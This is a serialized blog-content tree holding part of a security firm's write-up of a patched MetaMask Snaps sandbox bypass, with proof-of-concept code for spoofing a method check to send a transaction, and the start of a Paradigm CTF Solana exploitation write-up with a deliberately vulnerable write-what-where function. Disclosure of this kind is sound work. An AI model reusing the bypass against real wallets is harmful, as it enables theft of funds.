snap",{"type":25,"tag":216,"props":43744,"children":43745},{"style":6964},[43746],{"type":31,"value":179},{"type":25,"tag":216,"props":43748,"children":43749},{"style":7047},[43750],{"type":31,"value":35455},{"type":25,"tag":216,"props":43752,"children":43753},{"style":6964},[43754],{"type":31,"value":1850},{"type":25,"tag":216,"props":43756,"children":43757},{"style":6947},[43758],{"type":31,"value":2541},{"type":25,"tag":216,"props":43760,"children":43761},{"style":6964},[43762],{"type":31,"value":7107},{"type":25,"tag":216,"props":43764,"children":43765},{"class":6922,"line":7636},[43766],{"type":25,"tag":216,"props":43767,"children":43768},{"emptyLinePlaceholder":16},[43769],{"type":31,"value":7642},{"type":25,"tag":216,"props":43771,"children":43772},{"class":6922,"line":7645},[43773],{"type":25,"tag":216,"props":43774,"children":43775},{"style":6964},[43776],{"type":31,"value":7874},{"type":25,"tag":216,"props":43778,"children":43779},{"class":6922,"line":7654},[43780],{"type":25,"tag":216,"props":43781,"children":43782},{"emptyLinePlaceholder":16},[43783],{"type":31,"value":7642},{"type":25,"tag":216,"props":43785,"children":43786},{"class":6922,"line":7722},[43787,43791,43796],{"type":25,"tag":216,"props":43788,"children":43789},{"style":6936},[43790],{"type":31,"value":35339},{"type":25,"tag":216,"props":43792,"children":43793},{"style":7047},[43794],{"type":31,"value":43795}," transactionExploit",{"type":25,"tag":216,"props":43797,"children":43798},{"style":6964},[43799],{"type":31,"value":43568},{"type":25,"tag":216,"props":43801,"children":43802},{"class":6922,"line":7730},[43803,43807,43811,43815,43819,43823],{"type":25,"tag":216,"props":43804,"children":43805},{"style":6936},[43806],{"type":31,"value":11807},{"type":25,"tag":216,"props":43808,"children":43809},{"style":6947},[43810],{"type":31,"value":23025},{"type":25,"tag":216,"props":43812,"children":43813},{"style":6953},[43814],{"type":31,"value":6956},{"type":25,"tag":216,"props":43816,"children":43817},{"style":6964},[43818],{"type":31,"value":43588},{"type":25,"tag":216,"props":43820,"children":43821},{"style":6973},[43822],{"type":31,"value":12795},{"type":25,"tag":216,"props":43824,"children":43825},{"style":7375},[43826],{"type":31,"value":43597},{"type":25,"tag":216,"props":43828,"children":43829},{"class":6922,"line":7760},[43830],{"type":25,"tag":216,"props":43831,"children":43832},{"emptyLinePlaceholder":16},[43833],{"type":31,"value":7642},{"type":25,"tag":216,"props":43835,"children":43836},{"class":6922,"line":7768},[43837,43841,43845,43849,43853],{"type":25,"tag":216,"props":43838,"children":43839},{"style":6947},[43840],{"type":31,"value":43612},{"type":25,"tag":216,"props":43842,"children":43843},{"style":6964},[43844],{"type":31,"value":179},{"type":25,"tag":216,"props":43846,"children":43847},{"style":6947},[43848],{"type":31,"value":42276},{"type":25,"tag":216,"props":43850,"children":43851},{"style":6953},[43852],{"type":31,"value":6956},{"type":25,"tag":216,"props":43854,"children":43855},{"style":8205},[43856],{"type":31,"value":43629},{"type":25,"tag":216,"props":43858,"children":43859},{"class":6922,"line":7800},[43860],{"type":25,"tag":216,"props":43861,"children":43862},{"emptyLinePlaceholder":16},[43863],{"type":31,"value":7642},{"type":25,"tag":216,"props":43865,"children":43866},{"class":6922,"line":7808},[43867,43871,43875,43879,43883,43887,43891],{"type":25,"tag":216,"props":43868,"children":43869},{"style":6947},[43870],{"type":31,"value":43612},{"type":25,"tag":216,"props":43872,"children":43873},{"style":6964},[43874],{"type":31,"value":179},{"type":25,"tag":216,"props":43876,"children":43877},{"style":7047},[43878],{"type":31,"value":43376},{"type":25,"tag":216,"props":43880,"children":43881},{"style":6953},[43882],{"type":31,"value":6956},{"type":25,"tag":216,"props":43884,"children":43885},{"style":6964},[43886],{"type":31,"value":43660},{"type":25,"tag":216,"props":43888,"children":43889},{"style":6936},[43890],{"type":31,"value":18779},{"type":25,"tag":216,"props":43892,"children":43893},{"style":6964},[43894],{"type":31,"value":7241},{"type":25,"tag":216,"props":43896,"children":43897},{"class":6922,"line":7868},[43898,43902],{"type":25,"tag":216,"props":43899,"children":43900},{"style":6973},[43901],{"type":31,"value":20947},{"type":25,"tag":216,"props":43903,"children":43904},{"style":6964},[43905],{"type":31,"value":7241},{"type":25,"tag":216,"props":43907,"children":43908},{"class":6922,"line":13001},[43909,43913,43918],{"type":25,"tag":216,"props":43910,"children":43911},{"style":6947},[43912],{"type":31,"value":43687},{"type":25,"tag":216,"props":43914,"children":43915},{"style":8205},[43916],{"type":31,"value":43917}," \"eth_sendTransaction\"",{"type":25,"tag":216,"props":43919,"children":43920},{"style":6964},[43921],{"type":31,"value":7465},{"type":25,"tag":216,"props":43923,"children":43924},{"class":6922,"line":13019},[43925,43929],{"type":25,"tag":216,"props":43926,"children":43927},{"style":6947},[43928],{"type":31,"value":43704},{"type":25,"tag":216,"props":43930,"children":43931},{"style":6964},[43932],{"type":31,"value":43933}," [{\n",{"type":25,"tag":216,"props":43935,"children":43936},{"class":6922,"line":13064},[43937,43941,43946,43950],{"type":25,"tag":216,"props":43938,"children":43939},{"style":6947},[43940],{"type":31,"value":36027},{"type":25,"tag":216,"props":43942,"children":43943},{"style":8205},[43944],{"type":31,"value":43945}," \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\"",{"type":25,"tag":216,"props":43947,"children":43948},{"style":6964},[43949],{"type":31,"value":7026},{"type":25,"tag":216,"props":43951,"children":43952},{"style":6927},[43953],{"type":31,"value":43954},"// change this to your address\n",{"type":25,"tag":216,"props":43956,"children":43957},{"class":6922,"line":13170},[43958,43962,43966],{"type":25,"tag":216,"props":43959,"children":43960},{"style":6947},[43961],{"type":31,"value":36043},{"type":25,"tag":216,"props":43963,"children":43964},{"style":8205},[43965],{"type":31,"value":43945},{"type":25,"tag":216,"props":43967,"children":43968},{"style":6964},[43969],{"type":31,"value":7465},{"type":25,"tag":216,"props":43971,"children":43972},{"class":6922,"line":27455},[43973,43978,43983],{"type":25,"tag":216,"props":43974,"children":43975},{"style":6947},[43976],{"type":31,"value":43977},"        value:",{"type":25,"tag":216,"props":43979,"children":43980},{"style":8205},[43981],{"type":31,"value":43982}," \"0x1\"",{"type":25,"tag":216,"props":43984,"children":43985},{"style":6964},[43986],{"type":31,"value":7465},{"type":25,"tag":216,"props":43988,"children":43989},{"class":6922,"line":27490},[43990],{"type":25,"tag":216,"props":43991,"children":43992},{"style":6964},[43993],{"type":31,"value":43994},"      }]\n",{"type":25,"tag":216,"props":43996,"children":43997},{"class":6922,"line":27498},[43998],{"type":25,"tag":216,"props":43999,"children":44000},{"style":6964},[44001],{"type":31,"value":7311},{"type":25,"tag":216,"props":44003,"children":44004},{"class":6922,"line":27506},[44005],{"type":25,"tag":216,"props":44006,"children":44007},{"style":6964},[44008],{"type":31,"value":9823},{"type":25,"tag":216,"props":44010,"children":44011},{"class":6922,"line":27515},[44012],{"type":25,"tag":216,"props":44013,"children":44014},{"emptyLinePlaceholder":16},[44015],{"type":31,"value":7642},{"type":25,"tag":216,"props":44017,"children":44018},{"class":6922,"line":27557},[44019,44023,44027,44031,44035,44039,44043],{"type":25,"tag":216,"props":44020,"children":44021},{"style":6973},[44022],{"type":31,"value":43162},{"type":25,"tag":216,"props":44024,"children":44025},{"style":6947},[44026],{"type":31,"value":43742},{"type":25,"tag":216,"props":44028,"children":44029},{"style":6964},[44030],{"type":31,"value":179},{"type":25,"tag":216,"props":44032,"children":44033},{"style":7047},[44034],{"type":31,"value":35455},{"type":25,"tag":216,"props":44036,"children":44037},{"style":6964},[44038],{"type":31,"value":1850},{"type":25,"tag":216,"props":44040,"children":44041},{"style":6947},[44042],{"type":31,"value":2541},{"type":25,"tag":216,"props":44044,"children":44045},{"style":6964},[44046],{"type":31,"value":7797},{"type":25,"tag":216,"props":44048,"children":44049},{"class":6922,"line":27590},[44050],{"type":25,"tag":216,"props":44051,"children":44052},{"style":6964},[44053],{"type":31,"value":7874},{"type":25,"tag":216,"props":44055,"children":44056},{"class":6922,"line":27598},[44057],{"type":25,"tag":216,"props":44058,"children":44059},{"emptyLinePlaceholder":16},[44060],{"type":31,"value":7642},{"type":25,"tag":216,"props":44062,"children":44063},{"class":6922,"line":27606},[44064,44068,44072,44077,44081,44086,44090,44095,44100,44104,44108,44113,44117],{"type":25,"tag":216,"props":44065,"children":44066},{"style":6973},[44067],{"type":31,"value":42172},{"type":25,"tag":216,"props":44069,"children":44070},{"style":6936},[44071],{"type":31,"value":43074},{"type":25,"tag":216,"props":44073,"children":44074},{"style":7047},[44075],{"type":31,"value":44076}," onRpcRequest",{"type":25,"tag":216,"props":44078,"children":44079},{"style":6953},[44080],{"type":31,"value":1472},{"type":25,"tag":216,"props":44082,"children":44083},{"style":7375},[44084],{"type":31,"value":44085}," OnRpcRequestHandler",{"type":25,"tag":216,"props":44087,"children":44088},{"style":6953},[44089],{"type":31,"value":6956},{"type":25,"tag":216,"props":44091,"children":44092},{"style":6964},[44093],{"type":31,"value":44094}," ({ ",{"type":25,"tag":216,"props":44096,"children":44097},{"style":6947},[44098],{"type":31,"value":44099},"origin",{"type":25,"tag":216,"props":44101,"children":44102},{"style":6964},[44103],{"type":31,"value":7026},{"type":25,"tag":216,"props":44105,"children":44106},{"style":6947},[44107],{"type":31,"value":35455},{"type":25,"tag":216,"props":44109,"children":44110},{"style":6964},[44111],{"type":31,"value":44112}," }) ",{"type":25,"tag":216,"props":44114,"children":44115},{"style":6936},[44116],{"type":31,"value":18779},{"type":25,"tag":216,"props":44118,"children":44119},{"style":6964},[44120],{"type":31,"value":7241},{"type":25,"tag":216,"props":44122,"children":44123},{"class":6922,"line":27615},[44124],{"type":25,"tag":216,"props":44125,"children":44126},{"emptyLinePlaceholder":16},[44127],{"type":31,"value":7642},{"type":25,"tag":216,"props":44129,"children":44130},{"class":6922,"line":27691},[44131,44136,44140,44144,44148,44152],{"type":25,"tag":216,"props":44132,"children":44133},{"style":6973},[44134],{"type":31,"value":44135},"  switch",{"type":25,"tag":216,"props":44137,"children":44138},{"style":6964},[44139],{"type":31,"value":7016},{"type":25,"tag":216,"props":44141,"children":44142},{"style":6947},[44143],{"type":31,"value":35455},{"type":25,"tag":216,"props":44145,"children":44146},{"style":6964},[44147],{"type":31,"value":179},{"type":25,"tag":216,"props":44149,"children":44150},{"style":6947},[44151],{"type":31,"value":42276},{"type":25,"tag":216,"props":44153,"children":44154},{"style":6964},[44155],{"type":31,"value":18761},{"type":25,"tag":216,"props":44157,"children":44158},{"class":6922,"line":27724},[44159,44164,44169],{"type":25,"tag":216,"props":44160,"children":44161},{"style":6973},[44162],{"type":31,"value":44163},"    case",{"type":25,"tag":216,"props":44165,"children":44166},{"style":8205},[44167],{"type":31,"value":44168}," 'json'",{"type":25,"tag":216,"props":44170,"children":44171},{"style":6964},[44172],{"type":31,"value":9518},{"type":25,"tag":216,"props":44174,"children":44175},{"class":6922,"line":27732},[44176,44180,44184],{"type":25,"tag":216,"props":44177,"children":44178},{"style":6973},[44179],{"type":31,"value":43320},{"type":25,"tag":216,"props":44181,"children":44182},{"style":7047},[44183],{"type":31,"value":43563},{"type":25,"tag":216,"props":44185,"children":44186},{"style":6964},[44187],{"type":31,"value":7633},{"type":25,"tag":216,"props":44189,"children":44190},{"class":6922,"line":27740},[44191,44195,44200],{"type":25,"tag":216,"props":44192,"children":44193},{"style":6973},[44194],{"type":31,"value":44163},{"type":25,"tag":216,"props":44196,"children":44197},{"style":8205},[44198],{"type":31,"value":44199}," 'transaction'",{"type":25,"tag":216,"props":44201,"children":44202},{"style":6964},[44203],{"type":31,"value":9518},{"type":25,"tag":216,"props":44205,"children":44206},{"class":6922,"line":27777},[44207,44211,44215],{"type":25,"tag":216,"props":44208,"children":44209},{"style":6973},[44210],{"type":31,"value":43320},{"type":25,"tag":216,"props":44212,"children":44213},{"style":7047},[44214],{"type":31,"value":43795},{"type":25,"tag":216,"props":44216,"children":44217},{"style":6964},[44218],{"type":31,"value":7633},{"type":25,"tag":216,"props":44220,"children":44221},{"class":6922,"line":27790},[44222,44227],{"type":25,"tag":216,"props":44223,"children":44224},{"style":6973},[44225],{"type":31,"value":44226},"    default",{"type":25,"tag":216,"props":44228,"children":44229},{"style":6964},[44230],{"type":31,"value":9518},{"type":25,"tag":216,"props":44232,"children":44233},{"class":6922,"line":27803},[44234,44239,44243,44248,44252,44257],{"type":25,"tag":216,"props":44235,"children":44236},{"style":6973},[44237],{"type":31,"value":44238},"      throw",{"type":25,"tag":216,"props":44240,"children":44241},{"style":6936},[44242],{"type":31,"value":35895},{"type":25,"tag":216,"props":44244,"children":44245},{"style":7047},[44246],{"type":31,"value":44247}," Error",{"type":25,"tag":216,"props":44249,"children":44250},{"style":6964},[44251],{"type":31,"value":1850},{"type":25,"tag":216,"props":44253,"children":44254},{"style":8205},[44255],{"type":31,"value":44256},"'Method not found.'",{"type":25,"tag":216,"props":44258,"children":44259},{"style":6964},[44260],{"type":31,"value":7797},{"type":25,"tag":216,"props":44262,"children":44263},{"class":6922,"line":27816},[44264],{"type":25,"tag":216,"props":44265,"children":44266},{"style":6964},[44267],{"type":31,"value":9823},{"type":25,"tag":216,"props":44269,"children":44270},{"class":6922,"line":27870},[44271],{"type":25,"tag":216,"props":44272,"children":44273},{"style":6964},[44274],{"type":31,"value":20536},{"type":25,"tag":38,"props":44276,"children":44277},{},[44278,44280,44286,44288,44293],{"type":31,"value":44279},"We set ",{"type":25,"tag":82,"props":44281,"children":44283},{"className":44282},[],[44284],{"type":31,"value":44285},"x.method = \"snap_dialog\"",{"type":31,"value":44287}," to pass the assertion and setup a toJSON function to change this method to ",{"type":25,"tag":82,"props":44289,"children":44291},{"className":44290},[],[44292],{"type":31,"value":43495},{"type":31,"value":44294}," after.",{"type":25,"tag":606,"props":44296,"children":44298},{"id":44297},"mitigation",[44299],{"type":31,"value":44300},"Mitigation",{"type":25,"tag":38,"props":44302,"children":44303},{},[44304,44306,44311,44313,44320],{"type":31,"value":44305},"Metamask mitigated this issue by asserting the arguments after the ",{"type":25,"tag":82,"props":44307,"children":44309},{"className":44308},[],[44310],{"type":31,"value":43039},{"type":31,"value":44312}," function execution. The patch was introduced on commit ",{"type":25,"tag":162,"props":44314,"children":44317},{"href":44315,"rel":44316},"https://github.com/MetaMask/snaps/pull/1762/commits/168ff082102a65e2aad428f44c5b10f9a100c689",[166],[44318],{"type":31,"value":44319},"168ff08",{"type":31,"value":44321}," with the following changes:",{"type":25,"tag":206,"props":44323,"children":44327},{"className":44324,"code":44325,"language":44326,"meta":7,"style":7},"language-diff shiki shiki-themes slack-dark","const request = async (args: RequestArguments) => {\n-      assertEthereumOutboundRequest(args);\n-      const sanitizedArgs = getSafeJson(args);\n+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n+      assertEthereumOutboundRequest(sanitizedArgs);\n","diff",[44328],{"type":25,"tag":82,"props":44329,"children":44330},{"__ignoreMap":7},[44331,44339,44347,44355,44363],{"type":25,"tag":216,"props":44332,"children":44333},{"class":6922,"line":6923},[44334],{"type":25,"tag":216,"props":44335,"children":44336},{"style":6964},[44337],{"type":31,"value":44338},"const request = async (args: RequestArguments) => {\n",{"type":25,"tag":216,"props":44340,"children":44341},{"class":6922,"line":6769},[44342],{"type":25,"tag":216,"props":44343,"children":44344},{"style":8205},[44345],{"type":31,"value":44346},"-      assertEthereumOutboundRequest(args);\n",{"type":25,"tag":216,"props":44348,"children":44349},{"class":6922,"line":6778},[44350],{"type":25,"tag":216,"props":44351,"children":44352},{"style":8205},[44353],{"type":31,"value":44354},"-      const sanitizedArgs = getSafeJson(args);\n",{"type":25,"tag":216,"props":44356,"children":44357},{"class":6922,"line":7005},[44358],{"type":25,"tag":216,"props":44359,"children":44360},{"style":6989},[44361],{"type":31,"value":44362},"+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n",{"type":25,"tag":216,"props":44364,"children":44365},{"class":6922,"line":7110},[44366],{"type":25,"tag":216,"props":44367,"children":44368},{"style":6989},[44369],{"type":31,"value":44370},"+      assertEthereumOutboundRequest(sanitizedArgs);\n",{"type":25,"tag":26,"props":44372,"children":44373},{"id":32892},[44374],{"type":31,"value":22907},{"type":25,"tag":38,"props":44376,"children":44377},{},[44378],{"type":31,"value":44379},"This unique property spoofing vulnerability in the Snaps sandboxing implementation illustrates the wide range of control attackers have in Javascript, which makes designing robust sandbox implementations an extremely complex task.",{"type":25,"tag":38,"props":44381,"children":44382},{},[44383],{"type":31,"value":44384},"Metamask has implemented numerous layers to mitigate potential exploits, and we're proud to help contribute to making Snaps more secure.",{"type":25,"tag":9316,"props":44386,"children":44387},{},[44388],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":44390},[44391,44392,44399,44407],{"id":22916,"depth":6769,"text":22919},{"id":39415,"depth":6769,"text":39418,"children":44393},[44394,44395,44396,44397,44398],{"id":39426,"depth":6778,"text":39429},{"id":39494,"depth":6778,"text":39497},{"id":39530,"depth":6778,"text":39533},{"id":40926,"depth":6778,"text":40929},{"id":41284,"depth":6778,"text":41287},{"id":42071,"depth":6769,"text":42074,"children":44400},[44401,44402,44403,44404,44405,44406],{"id":42077,"depth":6778,"text":42080},{"id":42121,"depth":6778,"text":42124},{"id":43025,"depth":6778,"text":43028},{"id":9612,"depth":6778,"text":9615},{"id":43468,"depth":6778,"text":38792},{"id":44297,"depth":6778,"text":44300},{"id":32892,"depth":6769,"text":22907},"content:blog:2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps",{"_path":44412,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":44413,"description":44414,"author":44415,"image":44417,"date":44419,"isFeatured":16,"onBlogPage":16,"body":44420,"_type":6798,"_id":49839,"_source":6800,"_file":49840,"_stem":49841,"_extension":6803},"/blog/2023-12-11-jumping-around-in-the-vm","Solana: Jumping Around in the VM","An exploration of low-level Solana VM behavior. How to escalate from a powerful memory corruption primitive to full program control.",[44416,9670],"nicola",{"src":44418},"/posts/jumping-around-in-the-vm/cover.png","2023-12-11",{"type":22,"children":44421,"toc":49828},[44422,44436,44456,44461,44465,44478,44503,44509,44514,44529,44883,44898,45163,45179,45822,45828,45833,45846,45854,46066,46074,46377,46385,46528,46536,47061,47067,47079,47092,47106,47111,47879,47884,47892,47897,47903,47915,47980,47985,47998,48011,48017,48045,49195,49208,49250,49255,49260,49274,49414,49435,49456,49463,49514,49522,49533,49546,49551,49675,49688,49790,49794,49807,49812,49824],{"type":25,"tag":38,"props":44423,"children":44424},{},[44425,44427,44434],{"type":31,"value":44426},"In the world of CTFs, ",{"type":25,"tag":162,"props":44428,"children":44431},{"href":44429,"rel":44430},"https://twitter.com/paradigm_ctf",[166],[44432],{"type":31,"value":44433},"Paradigm CTF 2023",{"type":31,"value":44435}," was like no other. Presenting a unique Solana challenge, the goal was to leverage Jump Oriented Programming, a web2 binary exploitation technique, inside the Solana VM to achieve arbitrary CPI execution.",{"type":25,"tag":38,"props":44437,"children":44438},{},[44439,44441,44448,44449],{"type":31,"value":44440},"To succeed in this challenge, a strong understanding of the Solana VM is required. We've explored parts of the Solana VM internals in two previous blog posts: ",{"type":25,"tag":162,"props":44442,"children":44445},{"href":44443,"rel":44444},"https://osec.io/blog/2022-03-14-solana-security-intro",[166],[44446],{"type":31,"value":44447},"Solana: An Auditor's Introduction",{"type":31,"value":1307},{"type":25,"tag":162,"props":44450,"children":44453},{"href":44451,"rel":44452},"https://osec.io/blog/2022-08-27-reverse-engineering-solana",[166],[44454],{"type":31,"value":44455},"Reverse Engineering Solana with Binary Ninja.\n",{"type":25,"tag":38,"props":44457,"children":44458},{},[44459],{"type":31,"value":44460},"In this comprehensive overview, we'll break down critical components of the Solana BPF VM necessary to write a complete memory-corruption exploit. We then turn an arbitrary function call and memory write primitive into a full exploit.",{"type":25,"tag":26,"props":44462,"children":44463},{"id":22916},[44464],{"type":31,"value":22919},{"type":25,"tag":38,"props":44466,"children":44467},{},[44468,44470,44476],{"type":31,"value":44469},"The challenge itself resides into ",{"type":25,"tag":82,"props":44471,"children":44473},{"className":44472},[],[44474],{"type":31,"value":44475},"framework/",{"type":31,"value":44477},", and is composed of 2 parts:",{"type":25,"tag":2039,"props":44479,"children":44480},{},[44481,44492],{"type":25,"tag":2043,"props":44482,"children":44483},{},[44484,44490],{"type":25,"tag":82,"props":44485,"children":44487},{"className":44486},[],[44488],{"type":31,"value":44489},"framework/chall/lib.rs",{"type":31,"value":44491},": The on-chain eBPF program that needs to be exploited.",{"type":25,"tag":2043,"props":44493,"children":44494},{},[44495,44501],{"type":25,"tag":82,"props":44496,"children":44498},{"className":44497},[],[44499],{"type":31,"value":44500},"framework/src/main.rs",{"type":31,"value":44502},": Program that setups a solana test environment, gets a single instruction and make it possible to users to interact with the on-chain program.",{"type":25,"tag":606,"props":44504,"children":44506},{"id":44505},"vulnerable-program",[44507],{"type":31,"value":44508},"Vulnerable Program",{"type":25,"tag":38,"props":44510,"children":44511},{},[44512],{"type":31,"value":44513},"The program is simple: it parses the input data and does something based on the first byte. Each potential action is quite out of the ordinary though!",{"type":25,"tag":6711,"props":44515,"children":44516},{},[44517],{"type":25,"tag":2043,"props":44518,"children":44519},{},[44520,44521,44527],{"type":31,"value":11431},{"type":25,"tag":82,"props":44522,"children":44524},{"className":44523},[],[44525],{"type":31,"value":44526},"data[0] == 0",{"type":31,"value":44528}," a function that lets you write-what-where is executed",{"type":25,"tag":206,"props":44530,"children":44532},{"className":6915,"code":44531,"language":6914,"meta":7,"style":7},"#[inline(never)]\npub fn write(data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], *mut u64>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr.write_volatile(val);\n    }\n}\n",[44533],{"type":25,"tag":82,"props":44534,"children":44535},{"__ignoreMap":7},[44536,44544,44589,44600,44723,44840,44869,44876],{"type":25,"tag":216,"props":44537,"children":44538},{"class":6922,"line":6923},[44539],{"type":25,"tag":216,"props":44540,"children":44541},{"style":6964},[44542],{"type":31,"value":44543},"#[inline(never)]\n",{"type":25,"tag":216,"props":44545,"children":44546},{"class":6922,"line":6769},[44547,44551,44555,44560,44564,44568,44572,44576,44580,44584],{"type":25,"tag":216,"props":44548,"children":44549},{"style":6936},[44550],{"type":31,"value":17647},{"type":25,"tag":216,"props":44552,"children":44553},{"style":6936},[44554],{"type":31,"value":17652},{"type":25,"tag":216,"props":44556,"children":44557},{"style":7047},[44558],{"type":31,"value":44559}," write",{"type":25,"tag":216,"props":44561,"children":44562},{"style":6964},[44563],{"type":31,"value":1850},{"type":25,"tag":216,"props":44565,"children":44566},{"style":6947},[44567],{"type":31,"value":7669},{"type":25,"tag":216,"props":44569,"children":44570},{"style":6953},[44571],{"type":31,"value":1472},{"type":25,"tag":216,"props":44573,"children":44574},{"style":6953},[44575],{"type":31,"value":11093},{"type":25,"tag":216,"props":44577,"children":44578},{"style":6964},[44579],{"type":31,"value":7701},{"type":25,"tag":216,"props":44581,"children":44582},{"style":7375},[44583],{"type":31,"value":7378},{"type":25,"tag":216,"props":44585,"children":44586},{"style":6964},[44587],{"type":31,"value":44588},"]) {\n",{"type":25,"tag":216,"props":44590,"children":44591},{"class":6922,"line":6778},[44592,44596],{"type":25,"tag":216,"props":44593,"children":44594},{"style":6936},[44595],{"type":31,"value":17790},{"type":25,"tag":216,"props":44597,"children":44598},{"style":6964},[44599],{"type":31,"value":7241},{"type":25,"tag":216,"props":44601,"children":44602},{"class":6922,"line":7005},[44603,44607,44611,44615,44620,44624,44629,44633,44638,44642,44647,44651,44655,44659,44663,44667,44671,44675,44679,44683,44687,44691,44695,44699,44703,44707,44711,44715,44719],{"type":25,"tag":216,"props":44604,"children":44605},{"style":6936},[44606],{"type":31,"value":7011},{"type":25,"tag":216,"props":44608,"children":44609},{"style":6947},[44610],{"type":31,"value":17814},{"type":25,"tag":216,"props":44612,"children":44613},{"style":6953},[44614],{"type":31,"value":6956},{"type":25,"tag":216,"props":44616,"children":44617},{"style":6964},[44618],{"type":31,"value":44619}," std",{"type":25,"tag":216,"props":44621,"children":44622},{"style":6953},[44623],{"type":31,"value":7438},{"type":25,"tag":216,"props":44625,"children":44626},{"style":6964},[44627],{"type":31,"value":44628},"mem",{"type":25,"tag":216,"props":44630,"children":44631},{"style":6953},[44632],{"type":31,"value":7438},{"type":25,"tag":216,"props":44634,"children":44635},{"style":7047},[44636],{"type":31,"value":44637},"transmute",{"type":25,"tag":216,"props":44639,"children":44640},{"style":6953},[44641],{"type":31,"value":7438},{"type":25,"tag":216,"props":44643,"children":44644},{"style":6964},[44645],{"type":31,"value":44646},"\u003C[",{"type":25,"tag":216,"props":44648,"children":44649},{"style":7375},[44650],{"type":31,"value":7378},{"type":25,"tag":216,"props":44652,"children":44653},{"style":6964},[44654],{"type":31,"value":21184},{"type":25,"tag":216,"props":44656,"children":44657},{"style":6989},[44658],{"type":31,"value":8031},{"type":25,"tag":216,"props":44660,"children":44661},{"style":6964},[44662],{"type":31,"value":27006},{"type":25,"tag":216,"props":44664,"children":44665},{"style":6953},[44666],{"type":31,"value":8519},{"type":25,"tag":216,"props":44668,"children":44669},{"style":6936},[44670],{"type":31,"value":7691},{"type":25,"tag":216,"props":44672,"children":44673},{"style":7375},[44674],{"type":31,"value":9811},{"type":25,"tag":216,"props":44676,"children":44677},{"style":6964},[44678],{"type":31,"value":11562},{"type":25,"tag":216,"props":44680,"children":44681},{"style":6947},[44682],{"type":31,"value":7669},{"type":25,"tag":216,"props":44684,"children":44685},{"style":6964},[44686],{"type":31,"value":7701},{"type":25,"tag":216,"props":44688,"children":44689},{"style":6953},[44690],{"type":31,"value":6997},{"type":25,"tag":216,"props":44692,"children":44693},{"style":6989},[44694],{"type":31,"value":8031},{"type":25,"tag":216,"props":44696,"children":44697},{"style":6964},[44698],{"type":31,"value":19368},{"type":25,"tag":216,"props":44700,"children":44701},{"style":6953},[44702],{"type":31,"value":179},{"type":25,"tag":216,"props":44704,"children":44705},{"style":7047},[44706],{"type":31,"value":30120},{"type":25,"tag":216,"props":44708,"children":44709},{"style":6964},[44710],{"type":31,"value":17836},{"type":25,"tag":216,"props":44712,"children":44713},{"style":6953},[44714],{"type":31,"value":179},{"type":25,"tag":216,"props":44716,"children":44717},{"style":7047},[44718],{"type":31,"value":7628},{"type":25,"tag":216,"props":44720,"children":44721},{"style":6964},[44722],{"type":31,"value":19382},{"type":25,"tag":216,"props":44724,"children":44725},{"class":6922,"line":7110},[44726,44730,44735,44739,44743,44747,44751,44755,44759,44763,44767,44771,44775,44779,44783,44787,44791,44795,44799,44803,44807,44812,44816,44820,44824,44828,44832,44836],{"type":25,"tag":216,"props":44727,"children":44728},{"style":6936},[44729],{"type":31,"value":7011},{"type":25,"tag":216,"props":44731,"children":44732},{"style":6947},[44733],{"type":31,"value":44734}," val",{"type":25,"tag":216,"props":44736,"children":44737},{"style":6953},[44738],{"type":31,"value":6956},{"type":25,"tag":216,"props":44740,"children":44741},{"style":6964},[44742],{"type":31,"value":44619},{"type":25,"tag":216,"props":44744,"children":44745},{"style":6953},[44746],{"type":31,"value":7438},{"type":25,"tag":216,"props":44748,"children":44749},{"style":6964},[44750],{"type":31,"value":44628},{"type":25,"tag":216,"props":44752,"children":44753},{"style":6953},[44754],{"type":31,"value":7438},{"type":25,"tag":216,"props":44756,"children":44757},{"style":7047},[44758],{"type":31,"value":44637},{"type":25,"tag":216,"props":44760,"children":44761},{"style":6953},[44762],{"type":31,"value":7438},{"type":25,"tag":216,"props":44764,"children":44765},{"style":6964},[44766],{"type":31,"value":44646},{"type":25,"tag":216,"props":44768,"children":44769},{"style":7375},[44770],{"type":31,"value":7378},{"type":25,"tag":216,"props":44772,"children":44773},{"style":6964},[44774],{"type":31,"value":21184},{"type":25,"tag":216,"props":44776,"children":44777},{"style":6989},[44778],{"type":31,"value":8031},{"type":25,"tag":216,"props":44780,"children":44781},{"style":6964},[44782],{"type":31,"value":27006},{"type":25,"tag":216,"props":44784,"children":44785},{"style":7375},[44786],{"type":31,"value":11994},{"type":25,"tag":216,"props":44788,"children":44789},{"style":6964},[44790],{"type":31,"value":11562},{"type":25,"tag":216,"props":44792,"children":44793},{"style":6947},[44794],{"type":31,"value":7669},{"type":25,"tag":216,"props":44796,"children":44797},{"style":6964},[44798],{"type":31,"value":7701},{"type":25,"tag":216,"props":44800,"children":44801},{"style":6989},[44802],{"type":31,"value":8031},{"type":25,"tag":216,"props":44804,"children":44805},{"style":6953},[44806],{"type":31,"value":6997},{"type":25,"tag":216,"props":44808,"children":44809},{"style":6989},[44810],{"type":31,"value":44811},"16",{"type":25,"tag":216,"props":44813,"children":44814},{"style":6964},[44815],{"type":31,"value":19368},{"type":25,"tag":216,"props":44817,"children":44818},{"style":6953},[44819],{"type":31,"value":179},{"type":25,"tag":216,"props":44821,"children":44822},{"style":7047},[44823],{"type":31,"value":30120},{"type":25,"tag":216,"props":44825,"children":44826},{"style":6964},[44827],{"type":31,"value":17836},{"type":25,"tag":216,"props":44829,"children":44830},{"style":6953},[44831],{"type":31,"value":179},{"type":25,"tag":216,"props":44833,"children":44834},{"style":7047},[44835],{"type":31,"value":7628},{"type":25,"tag":216,"props":44837,"children":44838},{"style":6964},[44839],{"type":31,"value":19382},{"type":25,"tag":216,"props":44841,"children":44842},{"class":6922,"line":7216},[44843,44848,44852,44857,44861,44865],{"type":25,"tag":216,"props":44844,"children":44845},{"style":6947},[44846],{"type":31,"value":44847},"        